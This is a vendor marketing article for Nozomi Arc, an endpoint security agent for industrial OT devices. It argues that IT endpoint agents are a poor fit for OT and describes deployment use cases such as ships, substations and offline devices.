IT endpoint security agents don’t work in OT because they’re heavyweight and disruptive, can’t understand OT/IoT protocols and aren’t trained on OT environments so detect the wrong threats.

Endpoint security agents are a standard part of IT security deployments, not just on desktop computers, laptops and printers but on the explosion of IoT and remote devices. They’re essential for anti-virus protection and patching. Unfortunately, negative experiences deployingIT-focused agents on OT devices have led to scarce adoption of much-needed endpoint monitoring.

Here are some of the main reasons traditional endpoint agents fall short in industrial environments:

1. Heavyweight and Disruptive

Many OT devices and controllers have limited computing power and memory designed to perform specific tasks. Even standard anti-virus agents consume too many resources. IT endpoint security solutions also typically require a system reboot after installation, which means downtime.

2. Wrong Threats

Traditional vulnerability scanning and intrusion prevention systems are designed to detect IT threats using heuristics and machine learning models trained on IT environments. They don’t look for industrial threats, don’t understand industrial communication protocols and don’t recognize OT baselines. For example, while anti-virus solutions provide visibility into workstations, they can’t provide insight into industrial controllers and actuators. Some of the consequences include rendering engineering hardware unresponsive, flagging as malicious legitimate safety protocols or control-system commands, stopping a process or deleting a critical application it perceives as malware.

3. Kernel-level Access

By causing massive worldwide outages on Windows devices onJuly 19, 2024, the now-notorious defective content update to CrowdStrike’s Falcon endpoint sensor made OT stakeholders even more leery of deploying agents in industrial environments.

This incident highlights how critical it is to ensure endpoint security agents built to protect the unique high availability requirements for OT environments are safe and non-disruptive.

Released in 2023, Nozomi Arc does not operate at the kernel level of the host operating system, will never reboot your machines and is very light on system resources.

Safe, Effective Endpoint Security for OT Devices

Nozomi Arc is a safe, non-disruptive security agent purpose-built to protect the unique high availability requirements for OT endpoints. It sheds light on once unreachable, unmonitored areas of your environment where network sensors aren’t practical or are insufficient to detect East-West traffic, USB ports, log files, local network traffic and user activity. 

Benefits include:

• Provides detailed data including device type, vendor, OS or firmware version, serial number, IP and Mac addresses, nodes, zones, protocols used, active accounts and suspicious user activity.
• Detects threats such as infected third-party laptops. Operator errors, malicious insider threats and stolen credentials
• Analyzes event patterns in host log files using SIGMA rules and spot in-progress events involving malware, credential theft, script downloading and more. This context is useful for both operators and security analysts.
• Gives operators troubleshooting information they never had, which goes a long way toward building and trust. With endpoint sensors, they can see not just configuration changes and anomalies but also who’s logged onto a device, what other devices it’s communicating with and what protocols it’s using.

Top Use Cases for OT Endpoint Sensors

1. Strategic Deployment on Crown Jewels

Suppose network monitoring is overkill for your environment, but you still have critical assets to protect. Endpoint sensors enable you todeploy agents only on those assets, to monitor what matters most. They can beinstalled on hundreds of key endpoints with a few clicks and no reboot.

2. Speedier, No Hassle Deployment

‍Suppose you have a remote substation where switches can only be reconfigured during a one-hour annual outage — next February. Or maybe you’re dealing with a 12-year-old line switch with no free ports. Again, just install endpoint sensors with no reboot.

3. Low Bandwidth, High-Latency Network

Cargo ships are prime candidates for endpoint sensors. They depend on satellites for connectivity, and It’s almost impossible to deploy cabling.

4. One-Time or Short-Term Monitoring

Say you just want to monitor that contract technician while he’s plugged in. You can install an endpoint sensor to monitor the machine he’s connected to and configure it to delete itself when he logs out.

5. Monitoring Offline Devices

Nozomi Arc collects data locally even when the host device is not sending or receiving traffic and sends it upstream when the user connects to the network. This is a great way to get detailed audit trails from field devices and mobile workers.